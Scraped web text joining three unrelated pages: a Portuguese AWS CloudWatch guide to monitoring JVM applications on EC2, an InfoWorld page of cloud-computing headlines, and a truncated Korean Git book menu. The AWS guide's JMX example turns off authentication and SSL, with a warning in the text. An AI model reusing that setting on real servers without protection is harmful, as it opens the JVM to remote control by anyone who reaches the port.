PutMetricData uma vez por minuto para cada host do EC2. Isso significa que a API PutMetricData será chamada 30*24*60=43,200 em um mês com 30 dias para cada host do EC2. Para obter mais informações sobre os preços do CloudWatch, consulte Preço do Amazon CloudWatch . A calculadora de preços pode ajudar a estimar os custos mensais aproximados para o uso desta solução. Como usar a calculadora de preços para estimar os custos mensais da solução Abra a calculadora de preços do Amazon CloudWatch . Em Escolher uma região , selecione a região em que você gostaria de implantar a solução. Na seção Métricas , em Número de métricas , insira (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution . Na seção APIs , em Número de solicitações de API , insira 43200 * number of EC2 instances configured for this solution . Por padrão, o agente do CloudWatch executa uma operação PutMetricData a cada minuto para cada host do EC2. Na seção Painéis e alarmes , em Número de painéis , insira 1 . É possível visualizar os custos mensais estimados na parte inferior da calculadora de preços. Configuração do agente do CloudWatch para esta solução O agente do CloudWatch é um software que opera de maneira contínua e autônoma em seus servidores e em ambientes com contêineres. Ele coleta métricas, logs e rastreamentos da infraestrutura e das aplicações e os envia para o CloudWatch e para o X-Ray. Para obter mais informações sobre o agente do CloudWatch, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . A configuração do agente nesta solução coleta as métricas fundamentais para a solução. O agente do CloudWatch pode ser configurado para coletar mais métricas da JVM do que as que são exibidas por padrão no painel. Para obter uma lista de todas as métricas da JVM que você pode coletar, consulte Coletar métricas da JVM . Para obter informações gerais sobre a configuração do agente do CloudWatch, consulte Métricas coletadas pelo atendente do CloudWatch . Exposição de portas do JMX para a aplicação da JVM O agente do CloudWatch depende do JMX para coletar as métricas relacionadas ao processo da JVM. Para que isso aconteça, é necessário expor a porta do JMX da aplicação da JVM. As instruções para expor a porta do JMX dependem do tipo de workload que você está usando para a aplicação da JVM. Consulte a documentação específica para a aplicação para encontrar essas instruções. De maneira geral, para habilitar uma porta do JMX para monitoramento e gerenciamento, você precisa configurar as propriedades do sistema apresentadas a seguir para a aplicação da JVM. Certifique-se de especificar um número de porta que não esteja em uso. O exemplo apresentado a seguir configura o JMX sem autenticação. Se suas políticas ou seus requisitos de segurança exigirem que você habilite o JMX com autenticação por senha ou SSL para a obtenção de acesso remoto, consulte a documentação do JMX para definir a propriedade necessária. -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Analise os scripts de inicialização e os arquivos de configuração da aplicação para encontrar o local mais adequado para adicionar esses argumentos. Quando você executar um arquivo .jar usando a linha de comando, o comando pode ser semelhante ao apresentado a seguir, em que pet-search.jar é o nome do arquivo JAR da aplicação. $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar Configuração do agente para esta solução As métricas coletadas pelo agente são definidas na configuração do agente. A solução fornece configurações do agente para a coleta das métricas recomendadas com dimensões adequadas para o painel da solução. As etapas para a implantação da solução são descritas posteriormente em Implantação do agente para a sua solução . As informações apresentadas a seguir são destinadas a ajudar você a compreender como personalizar a configuração do agente para o seu ambiente. Você deve personalizar algumas partes da seguinte configuração do agente para o seu ambiente: O número da porta do JMX corresponde ao número da porta que você configurou na seção anterior desta documentação. Esse número está na linha endpoint na configuração. ProcessGroupName : forneça nomes significativos para a dimensão ProcessGroupName . Esses nomes devem representar o agrupamento de clusters, de aplicações ou de serviços para as instâncias do EC2 que executam aplicações ou processos semelhantes. Isso auxilia no agrupamento de métricas de instâncias que pertencem ao mesmo grupo de processos da JVM, proporcionando uma visão unificada da performance do cluster, da aplicação e do serviço no painel da solução. Por exemplo, caso você tenha duas aplicações em Java em execução na mesma conta, sendo uma para a aplicação order-processing e a outra para a aplicação inventory-management , é necessário configurar as dimensões ProcessGroupName de maneira adequada na configuração do agente de cada instância. Para as instâncias da aplicação order-processing , defina ProcessGroupName=order-processing . Para as instâncias da aplicação inventory-management , defina ProcessGroupName=inventory-management . Ao seguir essas diretrizes, o painel da solução agrupará automaticamente as métricas com base na dimensão ProcessGroupName . O painel incluirá opções do menu suspenso para a seleção e para a visualização de métricas de um grupo de processos específico, permitindo o monitoramento da performance de grupos de processos individuais separadamente. Configuração do agente para hosts da JVM Use a configuração do agente do CloudWatch apresentada a seguir nas instâncias do EC2 em que as aplicações em Java estão implantadas. A configuração será armazenada como um parâmetro no Parameter Store do SSM, conforme detalhado posteriormente em Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store . Substitua ProcessGroupName pelo nome do grupo de processos. Substitua port-number pelo número da porta do JMX da aplicação em Java. Se o JMX tiver sido habilitado com autenticação por senha ou SSL para acesso remoto, consulte Coletar métricas do Java Management Extensions (JMX) para obter informações sobre como configurar o TLS ou a autorização na configuração do agente, conforme necessário. As métricas do EC2 mostradas nesta configuração (configuração apresentada de forma externa ao bloco do JMX) funcionam somente para instâncias do Linux e do macOS. Caso esteja usando instâncias do Windows, é possível optar por omitir essas métricas na configuração. Para obter mais informações sobre as métricas coletadas em instâncias do Windows, consulte Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server . { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } Implantação do agente para a sua solução Existem várias abordagens para instalar o agente do CloudWatch, dependendo do caso de uso. Recomendamos o uso do Systems Manager para esta solução. Ele fornece uma experiência no console e simplifica o gerenciamento de uma frota de servidores gerenciados em uma única conta da AWS. As instruções apresentadas nesta seção usam o Systems Manager e são destinadas para situações em que o agente do CloudWatch não está em execução com as configurações existentes. É possível verificar se o agente do CloudWatch está em execução ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se você já estiver executando o agente do CloudWatch nos hosts do EC2 nos quais a workload está implantada e gerenciando as configurações do agente, pode pular as instruções apresentadas nesta seção e usar o mecanismo de implantação existente para atualizar a configuração. Certifique-se de combinar a configuração do agente da JVM com a configuração do agente existente e, em seguida, implante a configuração combinada. Se você estiver usando o Systems Manager para armazenar e gerenciar a configuração do agente do CloudWatch, poderá combinar a configuração com o valor do parâmetro existente. Para obter mais informações, consulte Managing CloudWatch agent configuration files . nota Ao usar o Systems Manager para implantar as configurações do agente do CloudWatch apresentadas a seguir, qualquer configuração existente do agente do CloudWatch nas suas instâncias do EC2 será substituída ou sobrescrita. É possível modificar essa configuração para atender às necessidades do ambiente ou do caso de uso específico. As métricas definidas nesta solução representam o requisito mínimo para o painel recomendado. O processo de implantação inclui as seguintes etapas: Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias. Etapa 2: armazenar o arquivo de configuração recomendado do agente no Systems Manager Parameter Store. Etapa 3: instalar o agente do CloudWatch em uma ou mais instâncias do EC2 usando uma pilha do CloudFormation. Etapa 4: verificar se a configuração do agente foi realizada corretamente. Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias Você deve conceder permissão para o Systems Manager instalar e configurar o agente do CloudWatch. Além disso, é necessário conceder permissão para que o agente do CloudWatch publique a telemetria da instância do EC2 para o CloudWatch. Certifique-se de que o perfil do IAM anexado à instância tenha as políticas do IAM CloudWatchAgentServerPolicy e AmazonSSMManagedInstanceCore associadas. Após criar o perfil, associe-o às suas instâncias do EC2. Siga as etapas apresentadas em Launch an instance with an IAM role para anexar um perfil durante a inicialização de uma nova instância do EC2. Para anexar um perfil a uma instância do EC2 existente, siga as etapas apresentadas em Attach an IAM role to an instance . Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store O Parameter Store simplifica a instalação do agente do CloudWatch em uma instância do EC2 ao armazenar e gerenciar os parâmetros de configuração de forma segura, eliminando a necessidade de valores com codificação rígida. Isso garante um processo de implantação mais seguro e flexível ao possibilitar o gerenciamento centralizado e as atualizações simplificadas para as configurações em diversas instâncias. Use as etapas apresentadas a seguir para armazenar o arquivo de configuração recomendado do agente do CloudWatch como um parâmetro no Parameter Store. Como criar o arquivo de configuração do agente do CloudWatch como um parâmetro Abra o console AWS Systems Manager em https://console.aws.amazon.com/systems-manager/ . No painel de navegação, escolha Gerenciamento de aplicações e, em seguida, Parameter Store . Siga as etapas apresentadas a seguir para criar um novo parâmetro para a configuração. Escolha Criar Parâmetro . Na caixa Nome , insira um nome que será usado para referenciar o arquivo de configuração do agente do CloudWatch nas etapas posteriores. Por exemplo, . AmazonCloudWatch-JVM-Configuration (Opcional) Na caixa Descrição , digite uma descrição para o parâmetro. Em Camadas de parâmetros , escolha Padrão . Para Tipo , escolha String . Em Tipo de dados , selecione texto . Na caixa Valor , cole o bloco em JSON correspondente que foi listado em Configuração do agente para hosts da JVM . Certifique-se de personalizar o valor da dimensão de agrupamento e o número da porta, conforme descrito. Escolha Criar Parâmetro . Etapa 3: instalar o agente do CloudWatch e aplicar a configuração usando um modelo do CloudFormation É possível usar o AWS CloudFormation para instalar o agente e configurá-lo para usar a configuração do agente do CloudWatch criada nas etapas anteriores. Como instalar e configurar o agente do CloudWatch para esta solução Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como CWAgentInstallationStack . Na seção Parâmetros , especifique o seguinte: Para CloudWatchAgentConfigSSM , insira o nome do parâmetro do Systems Manager para a configuração do agente que você criou anteriormente, como AmazonCloudWatch-JVM-Configuration . Para selecionar as instâncias de destino, você tem duas opções. Para InstanceIds , especifique uma lista delimitada por vírgulas de IDs de instâncias nas quais você deseja instalar o agente do CloudWatch com esta configuração. É possível listar uma única instância ou várias instâncias. Se você estiver realizando implantações em grande escala, é possível especificar a TagKey e o TagValue correspondente para direcionar todas as instâncias do EC2 associadas a essa etiqueta e a esse valor. Se você especificar uma TagKey , é necessário especificar um TagValue correspondente. (Para um grupo do Auto Scaling, especifique aws:autoscaling:groupName para a TagKey e defina o nome do grupo do Auto Scaling para a TagValue para realizar a implantação em todas as instâncias do grupo do Auto Scaling.) Caso você especifique tanto os parâmetros InstanceIds quanto TagKeys , InstanceIds terá precedência, e as etiquetas serão desconsideradas. Analise as configurações e, em seguida, escolha Criar pilha . Se você desejar editar o arquivo de modelo previamente para personalizá-lo, selecione a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar o seguinte link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . nota Após a conclusão desta etapa, este parâmetro do Systems Manager será associado aos agentes do CloudWatch em execução nas instâncias de destino. Isto significa que: Se o parâmetro do Systems Manager for excluído, o agente será interrompido. Se o parâmetro do Systems Manager for editado, as alterações de configuração serão aplicadas automaticamente ao agente na frequência programada, que, por padrão, é de 30 dias. Se você desejar aplicar imediatamente as alterações a este parâmetro do Systems Manager, você deverá executar esta etapa novamente. Para obter mais informações sobre as associações, consulte Working with associations in Systems Manager . Etapa 4: verificar se a configuração do agente foi realizada corretamente É possível verificar se o agente do CloudWatch está instalado ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se o agente do CloudWatch não estiver instalado e em execução, certifique-se de que todas as configurações foram realizadas corretamente. Certifique-se de ter anexado um perfil com as permissões adequadas para a instância do EC2, conforme descrito na Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias . Certifique-se de ter configurado corretamente o JSON para o parâmetro do Systems Manager. Siga as etapas em Solução de problemas de instalação do atendente do CloudWatch com o CloudFormation . Se todas as configurações estiverem corretas, as métricas da JVM serão publicadas no CloudWatch e estarão disponíveis para visualização. É possível verificar no console do CloudWatch para assegurar que as métricas estão sendo publicadas corretamente. Como verificar se as métricas da JVM estão sendo publicadas no CloudWatch Abra o console do CloudWatch, em https://console.aws.amazon.com/cloudwatch/ . Escolha Métricas e, depois, Todas as métricas . Certifique-se de ter selecionado a região na qual a solução foi implantada, escolha Namespaces personalizados e, em seguida, selecione CWAgent . Pesquise pelas métricas mencionadas em Configuração do agente para hosts da JVM , como jvm.memory.heap.used . Caso encontre resultados para essas métricas, isso significa que elas estão sendo publicadas no CloudWatch. Criação de um painel para a solução da JVM O painel fornecido por esta solução apresenta métricas para a Java Virtual Machine (JVM) subjacente para o servidor. O painel fornece uma visão geral da JVM ao agregar e apresentar métricas de todas as instâncias, disponibilizando um resumo de alto nível sobre a integridade geral e o estado operacional. Além disso, o painel mostra um detalhamento dos principais colaboradores (que corresponde aos dez principais por widget de métrica) para cada métrica. Isso ajuda a identificar rapidamente discrepâncias ou instâncias que contribuem significativamente para as métricas observadas. O painel da solução não exibe métricas do EC2. Para visualizar as métricas relacionadas ao EC2, é necessário usar o painel automático do EC2 para acessar as métricas fornecidas diretamente pelo EC2 e usar o painel do console do EC2 para consultar as métricas do EC2 que são coletadas pelo agente do CloudWatch. Para obter mais informações sobre os painéis automáticos para serviços da AWS, consulte Visualização de um painel do CloudWatch para um único serviço da AWS . Para criar o painel, é possível usar as seguintes opções: Usar o console do CloudWatch para criar o painel. Usar o console do AWS CloudFormation para implantar o painel. Fazer o download do código de infraestrutura como código do AWS CloudFormation e integrá-lo como parte da automação de integração contínua (CI). Ao usar o console do CloudWatch para criar um painel, é possível visualizá-lo previamente antes de criá-lo e incorrer em custos. nota O painel criado com o CloudFormation nesta solução exibe métricas da região em que a solução está implantada. Certifique-se de que a pilha do CloudFormation seja criada na mesma região em que as métricas da JVM são publicadas. Se as métricas do agente do CloudWatch estiverem sendo publicadas em um namespace diferente de CWAgent (por exemplo, caso você tenha fornecido um namespace personalizado), será necessário alterar a configuração do CloudFormation para substituir CWAgent pelo namespace personalizado que você está usando. Como criar o painel usando o console do CloudWatch nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Abra o console do CloudWatch e acesse Criar painel usando este link: https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Insira o nome do painel e, em seguida, escolha Criar painel . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Visualize previamente o painel e escolha Salvar para criá-lo. Como criar o painel usando o CloudFormation Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como JVMDashboardStack . Na seção Parâmetros , especifique o nome do painel no parâmetro DashboardName . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Confirme as funcionalidades de acesso relacionadas às transformações na seção Capacidades e transformações . Lembre-se de que o CloudFormation não adiciona recursos do IAM. Analise as configurações e, em seguida, escolha Criar pilha . Quando o status da pilha mostrar CREATE_COMPLETE , selecione a guia Recursos na pilha criada e, em seguida, escolha o link exibido em ID físico para acessar o painel. Como alternativa, é possível acessar o painel diretamente no console do CloudWatch ao selecionar Painéis no painel de navegação do console à esquerda e localizar o nome do painel na seção Painéis personalizados . Se você desejar editar o arquivo de modelo para personalizá-lo para atender a uma necessidade específica, é possível usar a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar este link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Como começar a usar o painel da JVM A seguir, apresentamos algumas tarefas que você pode realizar para explorar o novo painel da JVM. Essas tarefas permitem a validação do funcionamento correto do painel e fornecem uma experiência prática ao usá-lo para monitorar um grupo de processos da JVM. À medida que realiza as tarefas, você se familiarizará com a navegação no painel e com a interpretação das métricas visualizadas. Seleção de um grupo de processos Use a lista suspensa Nome do grupo de processos da JVM para selecionar o grupo de processos que você deseja monitorar. O painel será atualizado automaticamente para exibir as métricas para o grupo de processos selecionado. Caso você tenha várias aplicações ou ambientes em Java, cada um pode ser representado como um grupo de processos distinto. Selecionar o grupo de processos apropriado garante que você estará visualizando as métricas específicas para a aplicação ou para o ambiente que deseja analisar. Análise do uso de memória Na seção de visão geral do painel, localize os widgets de Porcentagem de uso de memória do heap e de Porcentagem de uso de memória não relacionada ao heap . Os widgets mostram a porcentagem de memória do heap e de memória não relacionada ao heap usadas em todas as JVMs no grupo de processos selecionado. Uma porcentagem elevada pode indicar pressão da memória, o que pode resultar em problemas de performance ou exceções OutOfMemoryError . Além disso, é possível realizar uma busca detalhada do uso de memória do heap por host na seção Uso de memória por host para identificar os hosts com maior utilização. Análise de threads e de classes carregadas Na seção Threads e classes carregadas pelo host , localize os widgets Contagem dos dez principais threads e Dez principais classes carregadas . Procure por JVMs que tenham um número anormalmente elevado de threads ou de classes em comparação com as demais. Um número excessivo de threads pode ser indicativo de vazamentos de threads ou de simultaneidade excessiva, enquanto um grande número de classes carregadas pode indicar possíveis vazamentos no carregador de classes ou problemas com a geração ineficiente de classes dinâmicas. Identificação de problemas de coleta de resíduos Na seção de Coleta de resíduos , localize os widgets Dez principais invocações de coleta de resíduos por minuto e Dez principais duração da coleta de resíduos , separados pelos diferentes tipos de coletor de lixo: Recente , Simultânea e Mista . Procure por JVMs que tenham um número anormalmente elevado de coleções ou de durações longas de coleta em comparação com as demais. Isso pode indicar problemas de configuração ou vazamentos de memória. O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Soluções de observabilidade do CloudWatch Workload do NGINX no EC2 Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://www.infoworld.com/cloud-computing/ | Cloud Computing | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Cloud Computing Sponsored by KPMG Cloud Computing Cloud Computing | News, how-tos, features, reviews, and videos Explore related topics Cloud Architecture Cloud Management Cloud Storage Cloud-Native Hybrid Cloud IaaS Managed Cloud Services Multicloud PaaS Private Cloud SaaS Latest from today analysis Which development platforms and tools should you learn now? For software developers, choosing which technologies and skills to master next has never been more difficult. Experts offer their recommendations. By Isaac Sacolick Jan 13, 2026 8 mins Development Tools Devops Generative AI analysis Why hybrid cloud is the future of enterprise platforms By David Linthicum Jan 13, 2026 4 mins Artificial Intelligence Cloud Architecture Hybrid Cloud news Oracle unveils Java development plans for 2026 By Paul Krill Jan 12, 2026 3 mins Java Programming Languages Software Development news AI is causing developers to abandon Stack Overflow By Mikael Markander Jan 12, 2026 2 mins Artificial Intelligence Generative AI Software Development opinion Stack thinking: Why a single AI platform won’t cut it By Tom Popomaronis Jan 12, 2026 8 mins Artificial Intelligence Development Tools Software Development news Postman snaps up Fern to reduce developer friction around API documentation and SDKs By Anirban Ghoshal Jan 12, 2026 3 mins APIs Software Development opinion Why ‘boring’ VS Code keeps winning By Matt Asay Jan 12, 2026 7 mins Developer GitHub Visual Studio Code feature How to succeed with AI-powered, low-code and no-code development tools By Bob Violino Jan 12, 2026 9 mins Development Tools Generative AI No Code and Low Code news Visual Studio Code adds support for agent skills By Paul Krill Jan 9, 2026 3 mins Development Tools Integrated Development Environments Visual Studio Code Articles news analysis Snowflake: Latest news and insights Stay up-to-date on how Snowflake and its underlying architecture has changed how cloud developers, data managers and data scientists approach cloud data management and analytics By Dan Muse Jan 9, 2026 5 mins Cloud Architecture Cloud Computing Cloud Management news Snowflake to acquire Observe to boost observability in AIops The acquisition could position Snowflake as a control plane for production AI, giving CIOs visibility across data, models, and infrastructure without the pricing shock of traditional observability stacks, analysts say. By Anirban Ghoshal Jan 9, 2026 3 mins Artificial Intelligence Software Development feature Python starts 2026 with a bang The world’s most popular programming language kicks off the new year with a wicked-fast type checker, a C code generator, and a second chance for the tail-calling interpreter. By Serdar Yegulalp Jan 9, 2026 2 mins Programming Languages Python Software Development news Microsoft open-sources XAML Studio Forthcoming update of the rapid prototyping tool for WinUI developers, now available on GitHub, adds a new Fluent UI design, folder support, and a live properties panel. By Paul Krill Jan 8, 2026 1 min Development Tools Integrated Development Environments Visual Studio analysis What drives your cloud security strategy? As cloud breaches increase, organizations should prioritize skills and training over the latest tech to address the actual root problems. By David Linthicum Jan 6, 2026 5 mins Careers Cloud Security IT Skills and Training news Databricks says its Instructed Retriever offers better AI answers than RAG in the enterprise Databricks says Instructed Retriever outperforms RAG and could move AI pilots to production faster, but analysts warn it could expose data, governance, and budget gaps that CIOs can’t ignore. By Anirban Ghoshal Jan 8, 2026 5 mins Artificial Intelligence Generative AI opinion The hidden devops crisis that AI workloads are about to expose Devops teams that cling to component-level testing and basic monitoring will struggle to keep pace with the data demands of AI. By Joseph Morais Jan 8, 2026 6 mins Artificial Intelligence Devops Generative AI news AI-built Rue language pairs Rust memory safety with ease of use Developed using Anthropic’s Claude AI model, the new language is intended to provide memory safety without garbage collection while being easier to use than Rust and Zig. By Paul Krill Jan 7, 2026 2 mins Generative AI Programming Languages Rust news Microsoft acquires Osmos to ease data engineering bottlenecks in Fabric The acquisition could help enterprises push analytics and AI projects into production faster while acting as the missing autonomy layer that connects Fabric’s recent enhancements into a coherent system. By Anirban Ghoshal Jan 7, 2026 4 mins Analytics Artificial Intelligence Data Engineering opinion What the loom tells us about AI and coding Like the loom, AI may turn the job market upside down. And enable new technologies and jobs that we simply can’t predict. By Nick Hodges Jan 7, 2026 4 mins Developer Engineer Generative AI analysis Generative UI: The AI agent is the front end In a new model for user interfaces, agents paint the screen with interactive UI components on demand. Let’s take a look. By Matthew Tyson Jan 7, 2026 8 mins Development Tools Generative AI Libraries and Frameworks news AI won’t replace human devs for at least 5 years Progress towards full AI-driven coding automation continues, but in steps rather than leaps, giving organizations time to prepare, according to a new study. By Taryn Plumb Jan 7, 2026 7 mins Artificial Intelligence Developer Roles news Automated data poisoning proposed as a solution for AI theft threat For hackers, the stolen data would be useless, but authorized users would have a secret key that filters out the fake information. By Howard Solomon Jan 7, 2026 6 mins Artificial Intelligence Data Privacy Privacy Show more Show less View all Video on demand video How to generate C-like programs with Python You might be familiar with how Python and C can work together, by way of projects like Cython. The new PythoC project has a unique twist on working with both languages: it lets you write type-decorated Python that can generate entire standalone C programs, not just importable Python libraries written in C. This video shows a few basic PythoC functions, from generating a whole program to using some of PythoC’s typing features to provide better memory management than C alone could. Dec 16, 2025 5 mins Python Zed Editor Review: The Rust-Powered IDE That Might Replace VS Code Dec 3, 2025 5 mins Python Python vs. Kotlin Nov 13, 2025 5 mins Python Hands-on with the new sampling profiler in Python 3.15 Nov 6, 2025 6 mins Python See all videos Explore a topic Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages View all topics All topics Close Browse all topics and categories below. Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages Python Security Software Development Technology Industry Show me more Latest Articles Videos news Ruby 4.0.0 introduces ZJIT compiler, Ruby Box isolation By Paul Krill Jan 6, 2026 3 mins Programming Languages Ruby Software Development news Open WebUI bug turns the ‘free model’ into an enterprise backdoor By Shweta Sharma Jan 6, 2026 3 mins Artificial Intelligence Security Vulnerabilities interview Generative AI and the future of databases By Martin Heller Jan 6, 2026 14 mins Artificial Intelligence Databases Generative AI video How to make local packages universal across Python venvs Nov 4, 2025 4 mins Python video X-ray vision for your async activity in Python 3.14 Oct 21, 2025 4 mins Python video Why it's so hard to redistribute standalone Python apps Oct 17, 2025 5 mins Python About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://git-scm.com/book/ko/v2/Git%ec%9d%98-%ea%b8%b0%ec%b4%88-Git-Alias | Git - Git Alias About Trademark Learn Book Cheat Sheet Videos External Links Tools Command Line GUIs Hosting Reference Install Community This book is available in English . Full translation available in azərbaycan dili , български език , Deutsch , Español , فارسی , Français , Ελληνικά , 日本語 , 한국어 , Nederlands , Русский , Slovenščina , Tagalog , Українська , 简体中文 , Partial translations available in Čeština , Македонски , Polski , Српски , Ўзбекча , 繁體中文 , Translations started for Беларуская , Indonesian , Italiano , Bahasa Melayu , Português (Brasil) , Português (Portugal) , Svenska , Türkçe . The source of this book is hosted on GitHub. Patches, suggestions and comments are welcome. Chapters ▾ 1. 시작하기 1.1 버전 관리란? 1.2 짧게 보는 Git의 역사 1.3 Git 기초 1.4 CLI 1.5 Git 설치 1.6 Git 최초 설정 1.7 도움말 보기 1.8 요약 2. Git의 기초 2.1 Git 저장소 만들기 2.2 수정하고 저장소에 저장하기 2.3 커밋 히스토리 조회하기 2.4 되돌리기 2.5 리모트 저장소 2.6 태그 2.7 Git Alias 2.8 요약 3. Git 브랜치 3.1 브랜치란 무엇인가 3.2 브랜치와 Merge 의 기초 3.3 브랜치 관리 3.4 브랜치 워크플로 3.5 리모트 브랜치 3.6 Rebase 하기 3.7 요약 4. Git 서버 4.1 프로토콜 4.2 서버에 Git 설치하기 4.3 SSH 공개키 만들기 4.4 서버 설정하기 4.5 Git 데몬 4.6 스마트 HTTP 4.7 GitWeb 4.8 GitLab 4.9 또 다른 선택지, 호스팅 4.10 요약 5. 분산 환경에서의 Git 5.1 분산 환경에서의 워크플로 5.2 프로젝트에 기여하기 5.3 프로젝트 관리하기 5.4 요약 6. GitHub 6.1 계정 만들고 설정하기 6.2 GitHub 프로젝트에 기여하기 6.3 GitHub 프로젝트 관리하기 6.4 Organization 관리하기 6.5 GitHub 스크립팅 6.6 요약 7. Git 도구 7.1 리비전 조회하기 7.2 대화형 